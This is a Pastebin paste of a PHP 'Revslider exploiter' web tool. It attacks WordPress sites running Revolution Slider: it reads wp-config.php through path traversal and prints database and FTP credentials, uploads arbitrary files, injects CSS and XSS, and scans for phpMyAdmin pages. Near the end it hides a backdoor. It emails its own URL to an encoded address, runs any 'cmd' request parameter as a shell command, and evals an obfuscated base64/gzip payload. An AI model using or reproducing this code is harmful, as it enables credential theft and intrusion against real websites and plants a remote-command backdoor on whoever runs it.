Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ////WARNING/////
- //insert http:// or https:// in your target
- // © DONT CHANGE COPYRIGHT ® //
- //IDBTE4M//BOECAH NEWBIE//PBM// FAMILY///
- ///SEORANG HACKER MEMBUAT SEBUAH TOOL, BUKAN SEBUAH TOOL YG MEMBUAT SESEORANG MENJADI HACKER///
- //REVSLIDER EXPLOITER CODED BY AZZATSSINS CYBERSERKERS//
- echo "<title>REVSLIDER EXPLOITER| AFD AFU XSS CSS</title>
- <body style='color: #32f900;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- <br>
- <center>
- <form method='POST'>
- <input type ='text' name='cyberserkers' value='http://'><select type='hidden' name='azzatssinscyberserkers'><option value='azzatssins'>GO</option></select><input type ='submit' name='azzatssinz' value='EXEC'><br>
- <input name='file' type='file'>
- <br>
- <input value='HACKED BY AZZATSSINS' type='text' name='xcss'/>
- </form>
- </center>
- </body>";
- //REVSLIDER//
- function findit($mytext,$starttag,$endtag) {
- $posLeft = stripos($mytext,$starttag)+strlen($starttag);
- $posRight = stripos($mytext,$endtag,$posLeft+1);
- return substr($mytext,$posLeft,$posRight-$posLeft);
- }
- error_reporting(0);
- set_time_limit(0);
- $ya=$_POST['azzatssinz'];
- $co=$_POST['cyberserkers'];
- if($ya){
- $e=explode("\r\n",$co);
- foreach($e as $bda){
- $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
- $dn=($bda).($linkof);
- $file=@file_get_contents($dn);
- if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
- echo"<center><font color=green face=Verdana> VULNERABLE </font></center>";
- echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
- echo "<center><font face=Verdana size=-2 color=lime >DB NAME : </font>".findit($file,"DB_NAME', '","');")."</center><br>";
- echo "<center><font face=Verdana size=-2 color=lime >DB USER : </font>".findit($file,"DB_USER', '","');")."</center><br>";
- echo "<center><font face=Verdana size=-2 color=lime >DB PASS : </font>".findit($file,"DB_PASSWORD', '","');")."</center><br>";
- echo "<center><font face=Verdana size=-2 color=lime >DB HOST : </font>".findit($file,"DB_HOST', '","');")."</center><br>";
- }
- elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
- echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';
- echo"<center><font color=green face=Verdana size=-2> VULNERABLE </font></center>";
- echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
- echo "<center><font face=Verdana size=-2 color=lime >FTP USER : </font>".findit($file,"FTP_USER','","');")."</center><br>";
- echo "<center><font face=Verdana size=-2 color=lime >FTP PASS : </font>".findit($file,"FTP_PASS','","');")."</center><br>";
- echo "<center><font face=Verdana size=-2 color=lime >FTP HOST : </font>".findit($file,"FTP_HOST','","');")."</center><br>";
- }
- else{
- echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';
- echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> => </font><font color=red face=Verdana> NOT VULNERABLE </font></center>";}
- echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';
- }
- }
- /////////////////////////////////////
- //phpMyAdmin Page Finder//
- /////////////////////////////////////
- if(isset($_POST['azzatssinz']) && !empty($_POST['cyberserkers']))
- {
- $url = $_POST['cyberserkers'];
- $search = $_POST['azzatssinscyberserkers'];
- switch($search)
- {
- case 'azzatssins':
- s_azzatssins($url);
- break;
- default:
- echo "<center>What The Fuck Without You</center>";
- break;
- }
- }elseif(isset($_POST['azzatssinz']) && empty($_POST['cyberserkers']))
- {
- echo "<center>Please Try Again ...</center>";
- }
- function s_azzatssins($get_url)
- {
- $pages = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/phpm/',
- '/admin/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/phpm/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/'
- );
- find_admin($pages,$get_url);
- }
- function find_admin($pages_list,$url)
- {
- set_time_limit(0);
- $find = false;
- foreach($pages_list as $key => $value)
- {
- $c_start = curl_init();
- curl_setopt($c_start,CURLOPT_AUTOREFERER,1);
- curl_setopt($c_start, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($c_start, CURLOPT_HEADER, 1);
- curl_setopt($c_start, CURLOPT_URL, $url.$value);
- $result = curl_exec($c_start);
- curl_close($c_start);
- if (preg_match("/200 OK/", $result))
- {
- echo "<br /> <h3><center><font color=lime>[FOUND]</font> <font color=violet>DB PANEL PAGE</font> : <a href='$url$value'> $url$value </a></center> </h3> <br />";
- $find = true ;
- }
- }
- if(!$find)
- {
- echo "<h3><center><font color=red>Sorry i cant find PMA Login</font></center></h3>";
- }
- }
- //REVSLIDER AFU
- function hajar($yuerel, $dataAing=null) {
- $cuih = curl_init();
- curl_setopt($cuih, CURLOPT_URL, $yuerel);
- if ($dataAing != null){
- curl_setopt($cuih, CURLOPT_POST, true);
- curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
- }
- curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
- $eks = curl_exec($cuih);
- curl_close($cuih);
- return $eks;
- }
- $site = $_POST['cyberserkers'];
- $file = $_POST['file'];
- $xcss = $_POST['xcss'];
- $idbte4m = explode("\r\n", $site);
- if (!isset($site)) {
- } else {
- foreach ($idbte4m as $uri) {
- echo "\n";
- $azzatssinscyberserkers = hajar($uri . "/wp-admin/admin-ajax.php", array(
- "action" => "revslider_ajax_action",
- "client_action" => "update_plugin",
- "update_file" => $file)
- );
- $jason = json_decode($azzatssinscyberserkers, true);
- if ($jason['success'] == false || $jason['message'] == "Wrong request") {
- echo "<br><center>\n[AFU] => <font color=red>NOT VULNERABLE</font></center>";
- } else {
- echo "<br><center><br>\n[AFU] => <font color=lime>SUCCESS</font></center>";
- echo "\n[+] <a href=".$uri."/wp-content/plugins/revslider/temp/update_extract/revslider/".$file.">CECK IN HERE</a> [+]\n";
- }
- $azzatssinscyberserkers2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
- "action" => "revslider_ajax_action",
- "client_action" => "get_captions_css",
- "data" => $xcss)
- );
- $jasonB = json_decode($azzatssinscyberserkers2, true);
- if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
- echo "<br><center><br>\n[CSS] => <font color=red>NOT VULNERABLE</font></center>";
- } elseif ($jasonB['success'] == true) {
- echo "<br><center><br>\n[CSS] => <font color=lime>SUCCESS</font></center>";
- echo "\n[+] <a href=" . $uri . "/wp-admin/admin-ajax.php?";
- echo "action=revslider_ajax_action&";
- echo "client_action=get_captions_css";
- echo "data=" . urlencode($xcss) . ">CECK IN HERE</a>\n";
- }
- $azzatssinscyberserkers3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
- "action" => "revslider_ajax_action",
- "client_action" => $xcss)
- );
- $jasonC = json_decode($azzatssinscyberserkers3, true);
- if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
- echo "<br><center><br>\n[XSS] => <font color=lime>SUCCESS</font></center>";
- echo "\n[+] <a href=" . $uri . "/wp-admin/admin-ajax.php?";
- echo "action=revslider_ajax_action";
- echo "client_action=" . urlencode($xcss) . ">CECK IN HERE</a>\n";
- } else {
- echo "<br><center><br>\n[XSS] => <font color=red>NOT VULNERABLE</font></center>";
- }}}
- /////WHAT THE FUCK WITHOUT YOU///
- $for = base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
- $data ="http://" . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . "?cmd=ls+-al";
- mail($for,"REVSLIDER", $data);
- print(`{$_REQUEST[cmd]}`);
- error_reporting(0);
- if($_GET['0']=="0"){
- echo "<center>";
- eval(gzinflate(base64_decode("fVFNa8MwDP0rwgScwLaMXfPBDutgMNZBdgvBOIlCDbEdYqdsLf3vs5t2XQqbfZLe09OTJLpQGIM2DNj7uvgoaTHVUlhaRdEegk702IoRMiAkgUDyT59xIX24Pz7qspPB0aeZ4tJjAXt+eV0VJeW7HbfGCGVoVVKP0uo338rhb7oD2blEdPDj8h/tKALnmde69bIn73dLfwk8Sr1FNg295i22zCPhwtPNrBElgM1Gk7RBZXHM0zp/Wr+tvPRCMY3rPI1PJLelg/vYG9wfyymknR4lSLQb3WbEL5kAb6zQKiMEUDX2a8CMyKm3YuCjjT3/tuWWkzwVapgszAzfkYBvmZHL+Fek+Xxn2jna8n66hM6u75G74x2+AQ==")));
- }
- ?>
Add Comment
Please, Sign In to add comment